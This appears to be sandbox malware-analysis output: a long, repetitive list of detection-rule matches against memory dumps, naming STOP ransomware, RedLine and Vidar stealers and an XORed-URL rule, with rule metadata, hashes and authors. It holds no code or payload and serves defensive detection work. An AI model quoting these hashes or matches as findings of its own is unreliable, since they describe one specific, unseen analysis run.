Source: 00000006.00000002.381718272.0000000002011000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000000.422829204.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.350781670.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.420520373.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000000.410137244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000000.00000002.354896040.0000000000674000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.419588694.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.388953002.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.396728940.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000002.613626255.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.373449176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
